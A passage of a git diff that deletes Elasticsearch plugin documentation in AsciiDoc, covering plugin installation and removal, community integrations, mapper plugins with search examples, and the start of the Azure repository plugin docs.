as a plugin, but is now a module distributed by default with -Elasticsearch. See {ref}/geoip-processor.html[GeoIP processor] for more -details. - -<>:: - -A processor that extracts details from the User-Agent header value. The -`user_agent` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See -{ref}/user-agent-processor.html[User Agent processor] for more details. - -[discrete] -=== Community contributed ingest plugins - -The following plugin has been contributed by our community: - -* https://github.com/johtani/elasticsearch-ingest-csv[Ingest CSV Processor Plugin] (by Jun Ohtani) - -include::ingest-attachment.asciidoc[] - -include::ingest-geoip.asciidoc[] - -include::ingest-user-agent.asciidoc[] diff --git a/docs/plugins/install_remove.asciidoc b/docs/plugins/install_remove.asciidoc deleted file mode 100644 index 0bb9e680498..00000000000 --- a/docs/plugins/install_remove.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[discrete] -[id="{plugin_name}-install"] -==== Installation - -ifeval::["{release-state}"=="unreleased"] - -Version {version} of the Elastic Stack has not yet been released. - -endif::[] - -ifeval::["{release-state}"!="unreleased"] - -This plugin can be installed using the plugin manager: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------- -sudo bin/elasticsearch-plugin install {plugin_name} ----------------------------------------------------------------- - -The plugin must be installed on every node in the cluster, and each node must -be restarted after installation. - -You can download this plugin for <> from {plugin_url}/{plugin_name}/{plugin_name}-{version}.zip. To verify -the `.zip` file, use the -{plugin_url}/{plugin_name}/{plugin_name}-{version}.zip.sha512[SHA hash] or -{plugin_url}/{plugin_name}/{plugin_name}-{version}.zip.asc[ASC key]. -endif::[] - -[discrete] -[id="{plugin_name}-remove"] -==== Removal - -The plugin can be removed with the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------- -sudo bin/elasticsearch-plugin remove {plugin_name} ----------------------------------------------------------------- - -The node must be stopped before removing the plugin. - diff --git a/docs/plugins/integrations.asciidoc b/docs/plugins/integrations.asciidoc deleted file mode 100644 index d4417c4f6f5..00000000000 --- a/docs/plugins/integrations.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[integrations]] - -== Integrations - -Integrations are not plugins, but are external tools or modules that make it easier to work with Elasticsearch. - -[discrete] -[[cms-integrations]] -=== CMS integrations - -[discrete] -==== Supported by the community: - -* https://drupal.org/project/search_api_elasticsearch[Drupal]: - Drupal Elasticsearch integration via Search API. - -* https://drupal.org/project/elasticsearch_connector[Drupal]: - Drupal Elasticsearch integration. - -* https://wordpress.org/plugins/elasticpress/[ElasticPress]: - Elasticsearch WordPress Plugin - -* https://wordpress.org/plugins/wpsolr-search-engine/[WPSOLR]: - Elasticsearch (and Apache Solr) WordPress Plugin - -* https://doc.tiki.org/Elasticsearch[Tiki Wiki CMS Groupware]: - Tiki has native support for Elasticsearch. This provides faster & better - search (facets, etc), along with some Natural Language Processing features - (ex.: More like this) - -* https://extensions.xwiki.org/xwiki/bin/view/Extension/Elastic+Search+Macro/[XWiki Next Generation Wiki]: - XWiki has an Elasticsearch and Kibana macro allowing to run Elasticsearch queries and display the results in XWiki pages using XWiki's scripting language as well as include Kibana Widgets in XWiki pages - -[discrete] -[[data-integrations]] -=== Data import/export and validation - -NOTE: Rivers were used to import data from external systems into Elasticsearch prior to the 2.0 release. Elasticsearch -releases 2.0 and later do not support rivers. - -[discrete] -==== Supported by Elastic: - -* {logstash-ref}/plugins-outputs-elasticsearch.html[Logstash output to Elasticsearch]: - The Logstash `elasticsearch` output plugin. -* {logstash-ref}/plugins-inputs-elasticsearch.html[Elasticsearch input to Logstash] - The Logstash `elasticsearch` input plugin. -* {logstash-ref}/plugins-filters-elasticsearch.html[Elasticsearch event filtering in Logstash] - The Logstash `elasticsearch` filter plugin. -* {logstash-ref}/plugins-codecs-es_bulk.html[Elasticsearch bulk codec] - The Logstash `es_bulk` plugin decodes the Elasticsearch bulk format into individual events. - -[discrete] -==== Supported by the community: - -* https://github.com/jprante/elasticsearch-jdbc[JDBC importer]: - The Java Database Connection (JDBC) importer allows to fetch data from JDBC sources for indexing into Elasticsearch (by Jörg Prante) - -* https://github.com/BigDataDevs/kafka-elasticsearch-consumer[Kafka Standalone Consumer (Indexer)]: - Kafka Standalone Consumer [Indexer] will read messages from Kafka in batches, processes(as implemented) and bulk-indexes them into Elasticsearch. Flexible and scalable. More documentation in above GitHub repo's Wiki. - -* https://github.com/ozlerhakan/mongolastic[Mongolastic]: - A tool that clones data from Elasticsearch to MongoDB and vice versa - -* https://github.com/Aconex/scrutineer[Scrutineer]: - A high performance consistency checker to compare what you've indexed - with your source of truth content (e.g. DB) - -* https://github.com/salyh/elasticsearch-imap[IMAP/POP3/Mail importer]: - The Mail importer allows to fetch data from IMAP and POP3 servers for indexing into Elasticsearch (by Hendrik Saly) - -* https://github.com/dadoonet/fscrawler[FS Crawler]: - The File System (FS) crawler allows to index documents (PDF, Open Office...) from your local file system and over SSH. (by David Pilato) - -* https://github.com/senacor/elasticsearch-evolution[Elasticsearch Evolution]: - A library to migrate elasticsearch mappings. - -* https://pgsync.com[PGSync]: - A tool for syncing data from Postgres to Elasticsearch. - -[discrete] -[[deployment]] -=== Deployment - -[discrete] -==== Supported by the community: -* https://github.com/elastic/ansible-elasticsearch[Ansible]: - Ansible playbook for Elasticsearch. - -* https://github.com/elastic/puppet-elasticsearch[Puppet]: - Elasticsearch puppet module. - -* https://github.com/elastic/cookbook-elasticsearch[Chef]: - Chef cookbook for Elasticsearch - -[discrete] -[[framework-integrations]] -=== Framework integrations - -[discrete] -==== Supported by the community: - -* https://camel.apache.org/components/2.x/elasticsearch-component.html[Apache Camel Integration]: - An Apache camel component to integrate Elasticsearch - -* https://metacpan.org/pod/Catmandu::Store::ElasticSearch[Catmandu]: - An Elasticsearch backend for the Catmandu framework. - -* https://github.com/FriendsOfSymfony/FOSElasticaBundle[FOSElasticaBundle]: - Symfony2 Bundle wrapping Elastica. - -* https://plugins.grails.org/plugin/puneetbehl/elasticsearch[Grails]: - Elasticsearch Grails plugin. - -* https://haystacksearch.org/[Haystack]: - Modular search for Django - -* https://hibernate.org/search/[Hibernate Search] - Integration with Hibernate ORM, from the Hibernate team. Automatic synchronization of write operations, yet exposes full Elasticsearch capabilities for queries. Can return either Elasticsearch native or re-map queries back into managed entities loaded within transaction from the reference database. - -* https://github.com/spring-projects/spring-data-elasticsearch[Spring Data Elasticsearch]: - Spring Data implementation for Elasticsearch - -* https://github.com/dadoonet/spring-elasticsearch[Spring Elasticsearch]: - Spring Factory for Elasticsearch - -* https://github.com/twitter/storehaus[Twitter Storehaus]: - Thin asynchronous Scala client for Storehaus. - -* https://zeebe.io[Zeebe]: - An Elasticsearch exporter acts as a bridge between Zeebe and Elasticsearch - -* https://pulsar.apache.org/docs/en/io-elasticsearch[Apache Pulsar]: - The Elasticsearch Sink Connector is used to pull messages from Pulsar topics - and persist the messages to a index. - -* https://micronaut-projects.github.io/micronaut-elasticsearch/latest/guide/index.html[Micronaut Elasticsearch Integration]: - Integration of Micronaut with Elasticsearch - -* https://streampipes.apache.org[Apache StreamPipes]: - StreamPipes is a framework that enables users to work with IoT data sources. - -* https://metamodel.apache.org/[Apache MetaModel]: - Providing a common interface for discovery, exploration of metadata and querying of different types of data sources. - -* https://jooby.org/doc/elasticsearch/[Jooby Framework]: - Scalable, fast and modular micro web framework for Java. - -* https://micrometer.io[Micrometer]: - Vendor-neutral application metrics facade. Think SLF4j, but for metrics. - -[discrete] -[[hadoop-integrations]] -=== Hadoop integrations - -[discrete] -==== Supported by Elastic: - -* link:/guide/en/elasticsearch/hadoop/current/[es-hadoop]: Elasticsearch real-time - search and analytics natively integrated with Hadoop. Supports Map/Reduce, - Cascading, Apache Hive, Apache Pig, Apache Spark and Apache Storm. - -[discrete] -==== Supported by the community: - -* https://github.com/criteo/garmadon[Garmadon]: - Garmadon is a solution for Hadoop Cluster realtime introspection. - - -[discrete] -[[monitoring-integrations]] -=== Health and Performance Monitoring - -[discrete] -==== Supported by the community: - -* https://github.com/radu-gheorghe/check-es[check-es]: - Nagios/Shinken plugins for checking on Elasticsearch - -* https://sematext.com/spm/index.html[SPM for Elasticsearch]: - Performance monitoring with live charts showing cluster and node stats, integrated - alerts, email reports, etc. -* https://www.zabbix.com/integrations/elasticsearch[Zabbix monitoring template]: - Monitor the performance and status of your {es} nodes and cluster with Zabbix - and receive events information. - -[[other-integrations]] -[discrete] -=== Other integrations - -[discrete] -==== Supported by the community: - -* https://www.wireshark.org/[Wireshark]: - Protocol dissection for HTTP and the transport protocol - -* https://www.itemsapi.com/[ItemsAPI]: - Search backend for mobile and web diff --git a/docs/plugins/management.asciidoc b/docs/plugins/management.asciidoc deleted file mode 100644 index 0aa25e16011..00000000000 --- a/docs/plugins/management.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[management]] -== Management Plugins - -Management plugins offer UIs for managing and interacting with Elasticsearch. - -[discrete] -=== Core management plugins - -The core management plugins are: - -link:/products/x-pack/monitoring[X-Pack]:: - -X-Pack contains the management and monitoring features for Elasticsearch. It -aggregates cluster wide statistics and events and offers a single interface to -view and analyze them. You can get a link:/subscriptions[free license] for basic -monitoring or a higher level license for more advanced needs. diff --git a/docs/plugins/mapper-annotated-text.asciidoc b/docs/plugins/mapper-annotated-text.asciidoc deleted file mode 100644 index 9307b6aaefe..00000000000 --- a/docs/plugins/mapper-annotated-text.asciidoc +++ /dev/null @@ -1,320 +0,0 @@ -[[mapper-annotated-text]] -=== Mapper Annotated Text Plugin - -experimental[] - -The mapper-annotated-text plugin provides the ability to index text that is a -combination of free-text and special markup that is typically used to identify -items of interest such as people or organisations (see NER or Named Entity Recognition -tools). - - -The elasticsearch markup allows one or more additional tokens to be injected, unchanged, into the token -stream at the same position as the underlying text it annotates. - -:plugin_name: mapper-annotated-text -include::install_remove.asciidoc[] - -[[mapper-annotated-text-usage]] -==== Using the `annotated-text` field - -The `annotated-text` tokenizes text content as per the more common {ref}/text.html[`text`] field (see -"limitations" below) but also injects any marked-up annotation tokens directly into -the search index: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "annotated_text" - } - } - } -} --------------------------- - -Such a mapping would allow marked-up text eg wikipedia articles to be indexed as both text -and structured tokens. The annotations use a markdown-like syntax using URL encoding of -one or more values separated by the `&` symbol. - - -We can use the "_analyze" api to test how an example annotation would be stored as tokens -in the search index: - - -[source,js] --------------------------- -GET my-index-000001/_analyze -{ - "field": "my_field", - "text":"Investors in [Apple](Apple+Inc.) rejoiced." -} --------------------------- -// NOTCONSOLE - -Response: - -[source,js] --------------------------------------------------- -{ - "tokens": [ - { - "token": "investors", - "start_offset": 0, - "end_offset": 9, - "type": "", - "position": 0 - }, - { - "token": "in", - "start_offset": 10, - "end_offset": 12, - "type": "", - "position": 1 - }, - { - "token": "Apple Inc.", <1> - "start_offset": 13, - "end_offset": 18, - "type": "annotation", - "position": 2 - }, - { - "token": "apple", - "start_offset": 13, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "rejoiced", - "start_offset": 19, - "end_offset": 27, - "type": "", - "position": 3 - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -<1> Note the whole annotation token `Apple Inc.` is placed, unchanged as a single token in -the token stream and at the same position (position 2) as the text token (`apple`) it annotates. - - -We can now perform searches for annotations using regular `term` queries that don't tokenize -the provided search values. Annotations are a more precise way of matching as can be seen -in this example where a search for `Beck` will not match `Jeff Beck` : - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "[Beck](Beck) announced a new tour"<1> -} - -PUT my-index-000001/_doc/2 -{ - "my_field": "[Jeff Beck](Jeff+Beck&Guitarist) plays a strat"<2> -} - -# Example search -GET my-index-000001/_search -{ - "query": { - "term": { - "my_field": "Beck" <3> - } - } -} --------------------------- - -<1> As well as tokenising the plain text into single words e.g. `beck`, here we -inject the single token value `Beck` at the same position as `beck` in the token stream. -<2> Note annotations can inject multiple tokens at the same position - here we inject both -the very specific value `Jeff Beck` and the broader term `Guitarist`. This enables -broader positional queries e.g. finding mentions of a `Guitarist` near to `start`. -<3> A benefit of searching with these carefully defined annotation tokens is that a query for -`Beck` will not match document 2 that contains the tokens `jeff`, `beck` and `Jeff Beck` - -WARNING: Any use of `=` signs in annotation values eg `[Prince](person=Prince)` will -cause the document to be rejected with a parse failure. In future we hope to have a use for -the equals signs so wil actively reject documents that contain this today. - - -[[mapper-annotated-text-tips]] -==== Data modelling tips -===== Use structured and unstructured fields - -Annotations are normally a way of weaving structured information into unstructured text for -higher-precision search. - -`Entity resolution` is a form of document enrichment undertaken by specialist software or people -where references to entities in a document are disambiguated by attaching a canonical ID. -The ID is used to resolve any number of aliases or distinguish between people with the -same name. The hyperlinks connecting Wikipedia's articles are a good example of resolved -entity IDs woven into text. - -These IDs can be embedded as annotations in an annotated_text field but it often makes -sense to include them in dedicated structured fields to support discovery via aggregations: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_unstructured_text_field": { - "type": "annotated_text" - }, - "my_structured_people_field": { - "type": "text", - "fields": { - "keyword" : { - "type": "keyword" - } - } - } - } - } -} --------------------------- - -Applications would then typically provide content and discover it as follows: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_unstructured_text_field": "[Shay](%40kimchy) created elasticsearch", - "my_twitter_handles": ["@kimchy"] <1> -} - -GET my-index-000001/_search -{ - "query": { - "query_string": { - "query": "elasticsearch OR logstash OR kibana",<2> - "default_field": "my_unstructured_text_field" - } - }, - "aggregations": { - "top_people" :{ - "significant_terms" : { <3> - "field" : "my_twitter_handles.keyword" - } - } - } -} --------------------------- - -<1> Note the `my_twitter_handles` contains a list of the annotation values -also used in the unstructured text. (Note the annotated_text syntax requires escaping). -By repeating the annotation values in a structured field this application has ensured that -the tokens discovered in the structured field can be used for search and highlighting -in the unstructured field. -<2> In this example we search for documents that talk about components of the elastic stack -<3> We use the `my_twitter_handles` field here to discover people who are significantly -associated with the elastic stack. - -===== Avoiding over-matching annotations -By design, the regular text tokens and the annotation tokens co-exist in the same indexed -field but in rare cases this can lead to some over-matching. - -The value of an annotation often denotes a _named entity_ (a person, place or company). -The tokens for these named entities are inserted untokenized, and differ from typical text -tokens because they are normally: - -* Mixed case e.g. `Madonna` -* Multiple words e.g. `Jeff Beck` -* Can have punctuation or numbers e.g. `Apple Inc.` or `@kimchy` - -This means, for the most part, a search for a named entity in the annotated text field will -not have any false positives e.g. when selecting `Apple Inc.` from an aggregation result -you can drill down to highlight uses in the text without "over matching" on any text tokens -like the word `apple` in this context: - - the apple was very juicy - -However, a problem arises if your named entity happens to be a single term and lower-case e.g. the -company `elastic`. In this case, a search on the annotated text field for the token `elastic` -may match a text document such as this: - - they fired an elastic band - -To avoid such false matches users should consider prefixing annotation values to ensure -they don't name clash with text tokens e.g. - - [elastic](Company_elastic) released version 7.0 of the elastic stack today - - - - -[[mapper-annotated-text-highlighter]] -==== Using the `annotated` highlighter - -The `annotated-text` plugin includes a custom highlighter designed to mark up search hits -in a way which is respectful of the original markup: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "The cat sat on the [mat](sku3578)" -} - -GET my-index-000001/_search -{ - "query": { - "query_string": { - "query": "cats" - } - }, - "highlight": { - "fields": { - "my_field": { - "type": "annotated", <1> - "require_field_match": false - } - } - } -} --------------------------- - -<1> The `annotated` highlighter type is designed for use with annotated_text fields - -The annotated highlighter is based on the `unified` highlighter and supports the same -settings but does not use the `pre_tags` or `post_tags` parameters. Rather than using -html-like markup such as `cat` the annotated highlighter uses the same -markdown-like syntax used for annotations and injects a key=value annotation where `_hit_term` -is the key and the matched search term is the value e.g. - - The [cat](_hit_term=cat) sat on the [mat](sku3578) - -The annotated highlighter tries to be respectful of any existing markup in the original -text: - -* If the search term matches exactly the location of an existing annotation then the -`_hit_term` key is merged into the url-like syntax used in the `(...)` part of the -existing annotation. -* However, if the search term overlaps the span of an existing annotation it would break -the markup formatting so the original annotation is removed in favour of a new annotation -with just the search hit information in the results. -* Any non-overlapping annotations in the original text are preserved in highlighter -selections - - -[[mapper-annotated-text-limitations]] -==== Limitations - -The annotated_text field type supports the same mapping settings as the `text` field type -but with the following exceptions: - -* No support for `fielddata` or `fielddata_frequency_filter` -* No support for `index_prefixes` or `index_phrases` indexing diff --git a/docs/plugins/mapper-murmur3.asciidoc b/docs/plugins/mapper-murmur3.asciidoc deleted file mode 100644 index 14f93186805..00000000000 --- a/docs/plugins/mapper-murmur3.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[mapper-murmur3]] -=== Mapper Murmur3 Plugin - -The mapper-murmur3 plugin provides the ability to compute hash of field values -at index-time and store them in the index. This can sometimes be helpful when -running cardinality aggregations on high-cardinality and large string fields. - -:plugin_name: mapper-murmur3 -include::install_remove.asciidoc[] - -[[mapper-murmur3-usage]] -==== Using the `murmur3` field - -The `murmur3` is typically used within a multi-field, so that both the original -value and its hash are stored in the index: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "keyword", - "fields": { - "hash": { - "type": "murmur3" - } - } - } - } - } -} --------------------------- - -Such a mapping would allow to refer to `my_field.hash` in order to get hashes -of the values of the `my_field` field. This is only useful in order to run -`cardinality` aggregations: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "my_field": "This is a document" -} - -PUT my-index-000001/_doc/2 -{ - "my_field": "This is another document" -} - -GET my-index-000001/_search -{ - "aggs": { - "my_field_cardinality": { - "cardinality": { - "field": "my_field.hash" <1> - } - } - } -} --------------------------- - -<1> Counting unique values on the `my_field.hash` field - -Running a `cardinality` aggregation on the `my_field` field directly would -yield the same result, however using `my_field.hash` instead might result in -a speed-up if the field has a high-cardinality. On the other hand, it is -discouraged to use the `murmur3` field on numeric fields and string fields -that are not almost unique as the use of a `murmur3` field is unlikely to -bring significant speed-ups, while increasing the amount of disk space required -to store the index. diff --git a/docs/plugins/mapper-size.asciidoc b/docs/plugins/mapper-size.asciidoc deleted file mode 100644 index c7140d865b8..00000000000 --- a/docs/plugins/mapper-size.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[mapper-size]] -=== Mapper Size Plugin - -The mapper-size plugin provides the `_size` metadata field which, when enabled, -indexes the size in bytes of the original -{ref}/mapping-source-field.html[`_source`] field. - -:plugin_name: mapper-size -include::install_remove.asciidoc[] - -[[mapper-size-usage]] -==== Using the `_size` field - -In order to enable the `_size` field, set the mapping as follows: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "_size": { - "enabled": true - } - } -} --------------------------- - -The value of the `_size` field is accessible in queries, aggregations, scripts, -and when sorting: - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "text": "This is a document" -} - -PUT my-index-000001/_doc/2 -{ - "text": "This is another document" -} - -GET my-index-000001/_search -{ - "query": { - "range": { - "_size": { <1> - "gt": 10 - } - } - }, - "aggs": { - "sizes": { - "terms": { - "field": "_size", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_size": { <3> - "order": "desc" - } - } - ], - "script_fields": { - "size": { - "script": "doc['_size']" <4> - } - }, - "docvalue_fields": [ - { - "field": "_size" <5> - } - ] -} --------------------------- -// TEST[continued] - -<1> Querying on the `_size` field -<2> Aggregating on the `_size` field -<3> Sorting on the `_size` field -<4> Uses a -{ref}/search-fields.html#script-fields[script field] -to return the `_size` field in the search response. -<5> Uses a -{ref}/search-fields.html#docvalue-fields[doc value -field] to return the `_size` field in the search response. Doc value fields are -useful if -{ref}/modules-scripting-security.html#allowed-script-types-setting[inline -scripts are disabled]. diff --git a/docs/plugins/mapper.asciidoc b/docs/plugins/mapper.asciidoc deleted file mode 100644 index 01046d270e7..00000000000 --- a/docs/plugins/mapper.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[mapper]] -== Mapper Plugins - -Mapper plugins allow new field data types to be added to Elasticsearch. - -[discrete] -=== Core mapper plugins - -The core mapper plugins are: - -<>:: - -The mapper-size plugin provides the `_size` metadata field which, when enabled, -indexes the size in bytes of the original -{ref}/mapping-source-field.html[`_source`] field. - -<>:: - -The mapper-murmur3 plugin allows hashes to be computed at index-time and stored -in the index for later use with the `cardinality` aggregation. - -<>:: - -The annotated text plugin provides the ability to index text that is a -combination of free-text and special markup that is typically used to identify -items of interest such as people or organisations (see NER or Named Entity Recognition -tools). - -include::mapper-size.asciidoc[] -include::mapper-murmur3.asciidoc[] -include::mapper-annotated-text.asciidoc[] diff --git a/docs/plugins/plugin-script.asciidoc b/docs/plugins/plugin-script.asciidoc deleted file mode 100644 index 775dd28e0ff..00000000000 --- a/docs/plugins/plugin-script.asciidoc +++ /dev/null @@ -1,271 +0,0 @@ -[[plugin-management]] -== Plugin Management - -The `plugin` script is used to install, list, and remove plugins. It is -located in the `$ES_HOME/bin` directory by default but it may be in a -different location depending on which Elasticsearch package you installed: - -* {ref}/targz.html#targz-layout[Directory layout of `.tar.gz` archives] -* {ref}/zip-windows.html#windows-layout[Directory layout of Windows `.zip` archives] -* {ref}/deb.html#deb-layout[Directory layout of Debian package] -* {ref}/rpm.html#rpm-layout[Directory layout of RPM] - -Run the following command to get usage instructions: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin -h ------------------------------------ - -[IMPORTANT] -.Running as root -===================== -If Elasticsearch was installed using the deb or rpm package then run -`/usr/share/elasticsearch/bin/elasticsearch-plugin` as `root` so it can write to the appropriate files on disk. -Otherwise run `bin/elasticsearch-plugin` as the user that owns all of the Elasticsearch -files. -===================== - -[[installation]] -=== Installing Plugins - -The documentation for each plugin usually includes specific installation -instructions for that plugin, but below we document the various available -options: - -[discrete] -=== Core Elasticsearch plugins - -Core Elasticsearch plugins can be installed as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [plugin_name] ------------------------------------ - -For instance, to install the core <>, just run the -following command: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install analysis-icu ------------------------------------ - -This command will install the version of the plugin that matches your -Elasticsearch version and also show a progress bar while downloading. - -[[plugin-management-custom-url]] -=== Custom URL or file system - -A plugin can also be downloaded directly from a custom location by specifying the URL: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [url] <1> ------------------------------------ -<1> must be a valid URL, the plugin name is determined from its descriptor. - --- -Unix:: -To install a plugin from your local file system at `/path/to/plugin.zip`, you could run: -+ -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install file:///path/to/plugin.zip ------------------------------------ - -Windows:: -To install a plugin from your local file system at `C:\path\to\plugin.zip`, you could run: -+ -[source,shell] ------------------------------------ -bin\elasticsearch-plugin install file:///C:/path/to/plugin.zip ------------------------------------ -+ -NOTE: Any path that contains spaces must be wrapped in quotes! -+ -NOTE: If you are installing a plugin from the filesystem the plugin distribution -must not be contained in the `plugins` directory for the node that you are -installing the plugin to or installation will fail. - -HTTP:: -To install a plugin from an HTTP URL: -+ -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install https://some.domain/path/to/plugin.zip ------------------------------------ -+ -The plugin script will refuse to talk to an HTTPS URL with an untrusted -certificate. To use a self-signed HTTPS cert, you will need to add the CA cert -to a local Java truststore and pass the location to the script as follows: -+ -[source,shell] ------------------------------------ -sudo ES_JAVA_OPTS="-Djavax.net.ssl.trustStore=/path/to/trustStore.jks" bin/elasticsearch-plugin install https://host/plugin.zip ------------------------------------ --- - -[[installing-multiple-plugins]] -=== Installing multiple plugins - -Multiple plugins can be installed in one invocation as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [plugin_id] [plugin_id] ... [plugin_id] ------------------------------------ - -Each `plugin_id` can be any valid form for installing a single plugin (e.g., the -name of a core plugin, or a custom URL). - -For instance, to install the core <>, and -<> run the following command: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install analysis-icu repository-s3 ------------------------------------ - -This command will install the versions of the plugins that matches your -Elasticsearch version. The installation will be treated as a transaction, so -that all the plugins will be installed, or none of the plugins will be installed -if any installation fails. - -[[mandatory-plugins]] -=== Mandatory Plugins - -If you rely on some plugins, you can define mandatory plugins by adding -`plugin.mandatory` setting to the `config/elasticsearch.yml` file, for -example: - -[source,yaml] --------------------------------------------------- -plugin.mandatory: analysis-icu,lang-js --------------------------------------------------- - -For safety reasons, a node will not start if it is missing a mandatory plugin. - -[[listing-removing-updating]] -=== Listing, Removing and Updating Installed Plugins - -[discrete] -=== Listing plugins - -A list of the currently loaded plugins can be retrieved with the `list` option: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin list ------------------------------------ - -Alternatively, use the {ref}/cluster-nodes-info.html[node-info API] to find -out which plugins are installed on each node in the cluster - -[discrete] -=== Removing plugins - -Plugins can be removed manually, by deleting the appropriate directory under -`plugins/`, or using the public script: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin remove [pluginname] ------------------------------------ - -After a Java plugin has been removed, you will need to restart the node to -complete the removal process. - -By default, plugin configuration files (if any) are preserved on disk; this is -so that configuration is not lost while upgrading a plugin. If you wish to -purge the configuration files while removing a plugin, use `-p` or `--purge`. -This can option can be used after a plugin is removed to remove any lingering -configuration files. - -[discrete] -=== Updating plugins - -Plugins are built for a specific version of Elasticsearch, and therefore must be reinstalled -each time Elasticsearch is updated. - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin remove [pluginname] -sudo bin/elasticsearch-plugin install [pluginname] ------------------------------------ - -=== Other command line parameters - -The `plugin` scripts supports a number of other command line parameters: - -[discrete] -=== Silent/Verbose mode - -The `--verbose` parameter outputs more debug information, while the `--silent` -parameter turns off all output including the progress bar. The script may -return the following exit codes: - -[horizontal] -`0`:: everything was OK -`64`:: unknown command or incorrect option parameter -`74`:: IO error -`70`:: any other error - -[discrete] -=== Batch mode - -Certain plugins require more privileges than those provided by default in core -Elasticsearch. These plugins will list the required privileges and ask the -user for confirmation before continuing with installation. - -When running the plugin install script from another program (e.g. install -automation scripts), the plugin script should detect that it is not being -called from the console and skip the confirmation response, automatically -granting all requested permissions. If console detection fails, then batch -mode can be forced by specifying `-b` or `--batch` as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install --batch [pluginname] ------------------------------------ - -[discrete] -=== Custom config directory - -If your `elasticsearch.yml` config file is in a custom location, you will need -to specify the path to the config file when using the `plugin` script. You -can do this as follows: - -[source,sh] ---------------------- -sudo ES_PATH_CONF=/path/to/conf/dir bin/elasticsearch-plugin install ---------------------- - -[discrete] -=== Proxy settings - -To install a plugin via a proxy, you can add the proxy details to the -`ES_JAVA_OPTS` environment variable with the Java settings `http.proxyHost` -and `http.proxyPort` (or `https.proxyHost` and `https.proxyPort`): - -[source,shell] ------------------------------------ -sudo ES_JAVA_OPTS="-Dhttp.proxyHost=host_name -Dhttp.proxyPort=port_number -Dhttps.proxyHost=host_name -Dhttps.proxyPort=https_port_number" bin/elasticsearch-plugin install analysis-icu ------------------------------------ - -Or on Windows: - -[source,shell] ------------------------------------- -set ES_JAVA_OPTS="-Dhttp.proxyHost=host_name -Dhttp.proxyPort=port_number -Dhttps.proxyHost=host_name -Dhttps.proxyPort=https_port_number" -bin\elasticsearch-plugin install analysis-icu ------------------------------------- - -=== Plugins directory - -The default location of the `plugins` directory depends on which package you install: - -* {ref}/targz.html#targz-layout[Directory layout of `.tar.gz` archives] -* {ref}/zip-windows.html#windows-layout[Directory layout of Windows `.zip` archives] -* {ref}/deb.html#deb-layout[Directory layout of Debian package] -* {ref}/rpm.html#rpm-layout[Directory layout of RPM] diff --git a/docs/plugins/redirects.asciidoc b/docs/plugins/redirects.asciidoc deleted file mode 100644 index 6e5675309d7..00000000000 --- a/docs/plugins/redirects.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="discovery-multicast"] -=== Multicast Discovery Plugin - -The `multicast-discovery` plugin has been removed. Instead, configure networking -using unicast (see {ref}/modules-network.html[Network settings]) or using -one of the <>. - -[role="exclude",id="cloud-aws"] -=== AWS Cloud Plugin - -Looking for a hosted solution for Elasticsearch on AWS? Check out https://www.elastic.co/cloud/. - -The Elasticsearch `cloud-aws` plugin has been split into two separate plugins: - -* <> (`discovery-ec2`) -* <> (`repository-s3`) - -[role="exclude",id="cloud-azure"] -=== Azure Cloud Plugin - -The `cloud-azure` plugin has been split into two separate plugins: - -* <> (`discovery-azure-classic`) -* <> (`repository-azure`) - - -[role="exclude",id="cloud-gce"] -=== GCE Cloud Plugin - -The `cloud-gce` plugin has been renamed to <> (`discovery-gce`). - -[role="exclude",id="plugins-delete-by-query"] -=== Delete-By-Query plugin removed - -The Delete-By-Query plugin has been removed in favor of a new {ref}/docs-delete-by-query.html[Delete By Query API] -implementation in core. - - - - - - - diff --git a/docs/plugins/repository-azure.asciidoc b/docs/plugins/repository-azure.asciidoc deleted file mode 100644 index f5b318b4d06..00000000000 --- a/docs/plugins/repository-azure.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[[repository-azure]] -=== Azure Repository Plugin - -The Azure Repository plugin adds support for using Azure as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. - -:plugin_name: repository-azure -include::install_remove.asciidoc[] - -[[repository-azure-usage]] -==== Azure Repository - -To enable Azure repositories, you have first to define your azure storage settings as -{ref}/secure-settings.html[secure settings], before starting up the node: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add azure.client.default.account -bin/elasticsearch-keystore add azure.client.default.key ----------------------------------------------------------------- - -Note that you can also define more than one account: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add azure.client.default.account -bin/elasticsearch-keystore add 